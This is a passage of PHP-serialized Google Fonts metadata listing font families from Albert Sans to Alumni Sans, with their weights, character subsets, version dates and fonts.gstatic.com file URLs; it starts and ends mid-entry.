AMFtZd_QA1Zeelmy79QJ1HOSY9AX74fybRUz1r5t.ttf\";s:9:\"500italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9Al74fybRUz1r5t.ttf\";s:9:\"600italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9DJ6IfybRUz1r5t.ttf\";s:9:\"700italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9Dw6IfybRUz1r5t.ttf\";s:9:\"800italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9CX6IfybRUz1r5t.ttf\";s:9:\"900italic\";s:97:\"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9C-6IfybRUz1r5t.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:19;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Aldrich\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/aldrich/v17/MCoTzAn-1s3IGyJMZaAS3pP5H_E.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:20;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Alef\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/alef/v21/FeVfS0NQpLYgrjJbC5FxxbU.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/alef/v21/FeVQS0NQpLYglo50L5la2bxii28.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:21;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Alegreya\";s:8:\"variants\";a:12:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";i:10;s:9:\"800italic\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v29\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":12:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/alegreya/v29/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hUI_KCisSGVrw.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/alegreya/v29/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGxBUI_KCisSGVrw.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/alegreya/v29/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGKBII_KCisSGVrw.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/alegreya/v29/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGERII_KCisSGVrw.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/alegreya/v29/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGdhII_KCisSGVrw.ttf\";s:3:\"900\";s:90:\"http://fonts.gstatic.com/s/alegreya/v29/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGXxII_KCisSGVrw.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/alegreya/v29/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlbgv6qmkySFr9V9.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/alegreya/v29/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlbSv6qmkySFr9V9.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/alegreya/v29/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlY-uKqmkySFr9V9.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/alegreya/v29/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlYHuKqmkySFr9V9.ttf\";s:9:\"800italic\";s:92:\"http://fonts.gstatic.com/s/alegreya/v29/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlZguKqmkySFr9V9.ttf\";s:9:\"900italic\";s:92:\"http://fonts.gstatic.com/s/alegreya/v29/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlZJuKqmkySFr9V9.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:22;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Alegreya SC\";s:8:\"variants\";a:10:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":10:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiOGmRtCJ62-O0HhNEa-a6o05E5abe_.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiMGmRtCJ62-O0HhNEa-Z6q2ZUbbKe_DGs.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiTGmRtCJ62-O0HhNEa-ZZc-rUxQqu2FXKD.ttf\";s:9:\"500italic\";s:85:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiRGmRtCJ62-O0HhNEa-Z6q4WEySK-UEGKDBz4.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiTGmRtCJ62-O0HhNEa-ZYU_LUxQqu2FXKD.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiRGmRtCJ62-O0HhNEa-Z6q4Sk0SK-UEGKDBz4.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiTGmRtCJ62-O0HhNEa-ZYI_7UxQqu2FXKD.ttf\";s:9:\"800italic\";s:85:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiRGmRtCJ62-O0HhNEa-Z6q4TU3SK-UEGKDBz4.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiTGmRtCJ62-O0HhNEa-ZYs_rUxQqu2FXKD.ttf\";s:9:\"900italic\";s:85:\"http://fonts.gstatic.com/s/alegreyasc/v22/taiRGmRtCJ62-O0HhNEa-Z6q4RE2SK-UEGKDBz4.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:23;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Alegreya Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:86:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUt9_-1phKLFgshYDvh6Vwt5TltuGdShm5bsg.ttf\";s:9:\"100italic\";s:88:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUv9_-1phKLFgshYDvh6Vwt7V9V3G1WpGtLsgu7.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUu9_-1phKLFgshYDvh6Vwt5fFPmE18imdCqxI.ttf\";s:9:\"300italic\";s:90:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUo9_-1phKLFgshYDvh6Vwt7V9VFE92jkVHuxKiBA.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUz9_-1phKLFgshYDvh6Vwt3V1nvEVXlm4.ttf\";s:6:\"italic\";s:86:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUt9_-1phKLFgshYDvh6Vwt7V9tuGdShm5bsg.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUu9_-1phKLFgshYDvh6Vwt5alOmE18imdCqxI.ttf\";s:9:\"500italic\";s:90:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUo9_-1phKLFgshYDvh6Vwt7V9VTE52jkVHuxKiBA.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUu9_-1phKLFgshYDvh6Vwt5eFImE18imdCqxI.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUo9_-1phKLFgshYDvh6Vwt7V9VBEh2jkVHuxKiBA.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUu9_-1phKLFgshYDvh6Vwt5f1LmE18imdCqxI.ttf\";s:9:\"800italic\";s:90:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUo9_-1phKLFgshYDvh6Vwt7V9VGEt2jkVHuxKiBA.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUu9_-1phKLFgshYDvh6Vwt5dlKmE18imdCqxI.ttf\";s:9:\"900italic\";s:90:\"http://fonts.gstatic.com/s/alegreyasans/v21/5aUo9_-1phKLFgshYDvh6Vwt7V9VPEp2jkVHuxKiBA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:24;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Alegreya Sans SC\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:92:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGn4-RGJqfMvt7P8FUr0Q1j-Hf1Dipl8g5FPYtmMg.ttf\";s:9:\"100italic\";s:94:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGl4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdlgRBH452Mvds.ttf\";s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DuJH0iRrMYJ_K-4.ttf\";s:9:\"300italic\";s:96:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdXiZhNaB6O-51OA.ttf\";s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGh4-RGJqfMvt7P8FUr0Q1j-Hf1Nk5v9ixALYs.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGn4-RGJqfMvt7P8FUr0Q1j-Hf1Bkxl8g5FPYtmMg.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DrpG0iRrMYJ_K-4.ttf\";s:9:\"500italic\";s:96:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdBidhNaB6O-51OA.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DvJA0iRrMYJ_K-4.ttf\";s:9:\"700italic\";s:96:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdTiFhNaB6O-51OA.ttf\";s:3:\"800\";s:93:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1Du5D0iRrMYJ_K-4.ttf\";s:9:\"800italic\";s:96:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdUiJhNaB6O-51OA.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DspC0iRrMYJ_K-4.ttf\";s:9:\"900italic\";s:96:\"http://fonts.gstatic.com/s/alegreyasanssc/v20/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxddiNhNaB6O-51OA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:25;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Aleo\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/aleo/v11/c4mg1nF8G8_syKbr9DVDno985KM.ttf\";s:9:\"300italic\";s:70:\"http://fonts.gstatic.com/s/aleo/v11/c4mi1nF8G8_swAjxeDdJmq159KOnWA.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/aleo/v11/c4mv1nF8G8_s8ArD0D1ogoY.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/aleo/v11/c4mh1nF8G8_swAjJ1B9tkoZl_Q.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/aleo/v11/c4mg1nF8G8_syLbs9DVDno985KM.ttf\";s:9:\"700italic\";s:70:\"http://fonts.gstatic.com/s/aleo/v11/c4mi1nF8G8_swAjxaDBJmq159KOnWA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:26;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Alex Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/alexbrush/v20/SZc83FzrJKuqFbwMKk6EtUL57DtOmCc.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:27;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Alfa Slab One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/alfaslabone/v17/6NUQ8FmMKwSEKjnm5-4v-4Jh6dVretWvYmE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:28;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Alice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/alice/v20/OpNCnoEEmtHa6FcJpA_chzJ0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:29;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Alike\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/alike/v20/HI_EiYEYI6BIoEjBSZXAQ4-d.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:30;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Alike Angular\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/alikeangular/v20/3qTrojWunjGQtEBlIcwMbSoI3kM6bB7FKjE.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:31;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Allan\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/allan/v20/ea8XadU7WuTxEtb2P9SF8nZE.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/allan/v20/ea8aadU7WuTxEu5KEPCN2WpNgEKU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:32;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Allerta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/allerta/v18/TwMO-IAHRlkbx940UnEdSQqO5uY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:33;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Allerta Stencil\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/allertastencil/v18/HTx0L209KT-LmIE9N7OR6eiycOeF-zz313DuvQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:34;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Allison\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/allison/v9/X7nl4b88AP2nkbvZOCaQ4MTgAgk.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:35;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Allura\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/allura/v18/9oRPNYsQpS4zjuAPjAIXPtrrGA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:36;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Almarai\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";i:3;s:3:\"800\";}s:7:\"subsets\";a:1:{i:0;s:6:\"arabic\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/almarai/v12/tssoApxBaigK_hnnS_anhnicoq72sXg.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/almarai/v12/tsstApxBaigK_hnnc1qPonC3vqc.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/almarai/v12/tssoApxBaigK_hnnS-aghnicoq72sXg.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/almarai/v12/tssoApxBaigK_hnnS_qjhnicoq72sXg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:37;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Almendra\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/almendra/v22/H4ckBXKAlMnTn0CskyY6wr-wg763.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/almendra/v22/H4ciBXKAlMnTn0CskxY4yLuShq63czE.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/almendra/v22/H4cjBXKAlMnTn0Cskx6G7Zu4qKK-aihq.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/almendra/v22/H4chBXKAlMnTn0CskxY48Ae9oqacbzhqDtg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:38;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Almendra Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/almendradisplay/v25/0FlPVOGWl1Sb4O3tETtADHRRlZhzXS_eTyer338.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:39;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Almendra SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/almendrasc/v25/Iure6Yx284eebowr7hbyTZZJprVA4XQ0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:40;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Alumni Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9OO5QqFsJ3C8qng.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9uO9QqFsJ3C8qng.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9Zu9QqFsJ3C8qng.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9OO9QqFsJ3C8qng.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9Cu9QqFsJ3C8qng.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd95uhQqFsJ3C8qng.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd93-hQqFsJ3C8qng.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9uOhQqFsJ3C8qng.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9kehQqFsJ3C8qng.ttf\";s:9:\"100italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Ky46lEN_io6npfB.ttf\";s:9:\"200italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kw461EN_io6npfB.ttf\";s:9:\"300italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kzm61EN_io6npfB.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Ky461EN_io6npfB.ttf\";s:9:\"500italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhW